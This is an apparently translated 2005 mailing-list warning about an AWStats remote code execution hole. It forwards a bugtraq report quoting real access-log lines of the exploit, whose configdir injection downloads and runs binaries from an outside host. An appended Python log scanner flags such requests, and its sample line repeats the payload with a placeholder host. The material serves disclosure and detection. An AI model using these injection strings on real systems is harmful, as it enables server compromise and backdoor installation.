From: Michael Shigorin
To: community@altlinux.ru
Cc: support@altlinux.ru
Date: Fri, 28 Jan 2005 11:25:08 +0200
Message-ID: <20050128092508.GR22364@osdn.org.ua>
Subject: [Comm] UI: awstats trouble

Hello.

I strongly recommend that awstats users block access to awstats.pl -- yesterday's warning on bugtraq@ is accurate: last night, on one of the projects hosted with us, this hole was used by Brazilian monkeys to plant a spam trojan.
-- 
 ---- WBR, Michael Shigorin ------ Linux.Kiev http://www.linux.kiev.ua/

----- Forwarded message -----

From: Delian Krustev
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, security-alerts@linuxsecurity.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Date: Wed, 26 Jan 2005 20:31:51 +0200
Message-Id: <200501262031.51944.krustev@krustev.net>
In-Reply-To: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>

There's an exploit in the wild.
Here's what it does:

200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

I don't have the time to investigate the "cgi" and "dc" binaries. The "cgi" at least tries to daemonize and opens a TCP listening socket. They also try to replace the index page on the vulnerable site.
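As an added example (not from either post), a detection pass a log reviewer could run over Apache access logs to surface requests of the kind quoted above; the sample log lines, the dropper.example host and the IPs in it are constructed.

```python
"""Flag AWStats configdir command-injection attempts in Apache combined logs.
Added example, not part of the post; log lines are constructed (placeholder hosts/IPs)."""
import re
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def query_params(query):
    """Split a raw query on '&' only: the injected value itself contains ';'."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params

def awstats_injection(line):
    """Return a finding dict for an awstats.pl configdir injection, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith("/awstats.pl"):
        return None
    for value in query_params(query).get("configdir", []):
        # configdir reaches a Perl two-argument open(): a leading "|" runs the rest
        # as a shell pipeline, and a NUL (%00) truncates the appended file name.
        if value.startswith("|") or "\x00" in value:
            return {"ip": m.group("ip"), "time": m.group("time"),
                    "status": int(m.group("status")), "configdir": value}
    return None

SAMPLE_LOG = [  # constructed: first line mirrors the post's hit, the rest are benign
    '203.0.113.7 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl'
    '?configdir=|cd%20/tmp;wget%20http://dropper.example/cgi;chmod%20777%20cgi;./cgi;%00'
    ' HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.4 - - [26/Jan/2005:07:00:01 +0000] "GET /cgi-bin/awstats/awstats.pl'
    '?config=www.example&output=main HTTP/1.1" 200 18044 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/Jan/2005:07:00:05 +0000] "GET /cgi-bin/awstats/awstats.pl'
    '?configdir=/etc/awstats&config=www.example HTTP/1.1" 200 18044 "-" "Mozilla/5.0"',
]

def scan(lines):
    return [f for f in map(awstats_injection, lines) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} HTTP {f['status']} configdir={f['configdir']!r}")
```

A hit with status 200 and a non-trivial size, as in the post, means the script ran the payload rather than erroring out, so the host should be treated as compromised, not merely probed.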